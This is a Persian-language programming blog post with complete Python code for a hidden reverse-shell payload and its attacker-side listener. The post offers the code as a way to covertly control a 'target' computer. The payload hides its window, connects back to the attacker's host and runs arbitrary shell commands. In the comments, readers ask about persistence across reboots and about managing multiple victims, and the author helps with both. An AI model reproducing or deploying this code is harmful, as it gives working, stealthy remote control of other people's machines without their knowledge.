طراحی پیلود Reverse TCP در پایتون و کنترل سیستم هدف از طریق آن :: Mr Python | مستر پایتون

طراحی پیلود Reverse TCP در پایتون و کنترل سیستم هدف از طریق آن

  • ۱۴۳۸

طراحی پیلود Reverse TCP در پایتون و کنترل سیستم هدف از طریق آن

درود به همه !

 

اگه یادتون باشه قبلا پستی به نام ( ساخت پیلود شخصی برای کنترل کامپیوتر شخصی در پایتون ) منتشر کرده بودیم که در این پست اومدیم یک پیلود بسیار ساده طراحی کردیم و با استفاده از اون میتونستیم دستورات دلخواهمون رو روی کامپیوتر هدفمون اجرا کنیم . ولی این پیلود مشکلات زیادی داشت و کاملا مبتدی بود . امروز تصمیم گرفتیم از صفر شروع کنیم و یک پیلود Reverse TCP خیلی قوی تر از پیلود قبلی بنویسیم با قابلیت هایی مثل مخفی کردن خودش از دید کاربر و ... و با استفاده از اون دستورات دلخواهمون رو روی سیستم هدفمون اجرا کنیم و کنترلش کنیم .

 

ویدیو آموزش : 

سورس شنودگر (سیستم هکر):

# hacker

import socket

sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

sock.bind(("192.168.1.103",12345))

sock.listen()

c, addr = sock.accept()
c.settimeout(3)
while True:
    command = input("target >> ")
    if command == "exit":
        c.send(b"exit")
        sock.close()
        break
    c.send(command.encode())

    try:
        result = c.recv(1024)
        print(result.decode())
    except:
        pass
    
    

سورس payload (سیستم هدف):

# target

import socket
import subprocess

from win32con import SW_HIDE
import win32gui

def hidden():
    pid = win32gui.GetForegroundWindow()
    win32gui.ShowWindow(pid , SW_HIDE)

hidden()

sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

sock.connect(("192.168.1.103" , 12345))

while True:
    command = sock.recv(1024)
    if command == b"exit":
        sock.close()
        break
    proc = subprocess.Popen(command.decode() , shell=True , stdout=subprocess.PIPE,
                            stderr = subprocess.PIPE)

    result = proc.stdout.read() + proc.stderr.read()

    sock.send(result)

امیدوارم لذت ببرید .

سوالی بود مطرح کنید

 

یا حق !

Telegram Channel : @mrpythonblog

  • سلام وقت بخیر

    اگه میشه یک ایدی تلگرام یا لینک گروهی رو بدید که بشه باهاتون در ارتباط بود ممنون میشم قرار بدید

    پاسخ:
    سلام . 
    لینک کانال :‌ mrpythonblog@
    برای ارتباط هم ‌mrpythonadmin@
  • سلام 
    ممنون و بسار عالی بود
    مهندس اگر ما چند تا سیستم هدف یا payload  داشته باشیم چطور مشخص کنیم تو کدام یک اجرا بشه و مدیریت دادشته باشم رو هر کدام که خواستیم؟
    ممنون.

    پاسخ:
    سلام . 
    خواهش میکنم . این موضوع بستگی به طراحی پیلودتون داره . مثلا میتونید با طراحی یک شنودگر (Listener) پیشرفته تر کاری کنید که روی چندین پورت شنود کنه و هر کدومش مربوط به یکی از اهدافتونه .
    این یه مثاله روش های دیگه هم هستن .
  • سلام من وقتی دستور pip install win32gui رو میزم ارور no module named میده چیکار کنم؟

    پاسخ:
    سلام .
    بزنید pip install pypiwin32
  • عالی بود فقط من میخواستم بدونم چی کار کنیم که وقتی تارگت یکبار فایلو اجرا میکنه تا ابد رو سیستمش باشه حتی وقتی سیتمشو خاموش و روشن میکنه بازم به صورت مخفی اجرا بشه 

    پاسخ:
    درود بر شما . ممنونم که بازدید کردید :)
    این پستمون رو بخونید در مورد همین موضوع صحبت کردیم . اینکه یک اسکریپت به طور خودکار بعد از هربار روشن شدن سیستم اجرا بشه .
  • سلام.

    برای من این خطا را می دهد:

    ModuleNotFoundError: No module named 'win32con'

    پاسخ:
    درود بر شما .
    باید پکیج pywin32 رو نصب کنید .
    برای اینکار از pip استفاده کنید : 


    pip install pywin32
  • عالی بود مرسی

    پاسخ:
    درود .
    ممنونم و خواهش میکنم :)
  • عالی بود همینطور ادامه بدین:)

    پاسخ:
    درود :)
    تشکر :) .
  • اگه میشه سورس کدش رو هم بزارین

    پاسخ:
    سلام . 
    بارگذاری شد :)
  • سلام

    دمت گرم مهندس هنوز ندیدم ولی مطمعنم اموزش خوبی میشه
    بعد از دیدن میام نتیجه رو اعلام میکنم :)

    پاسخ:
    درود بر شما .
    ممنونم از اعتمادتون :))
    امیدوارم مفید واقع بشه .
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی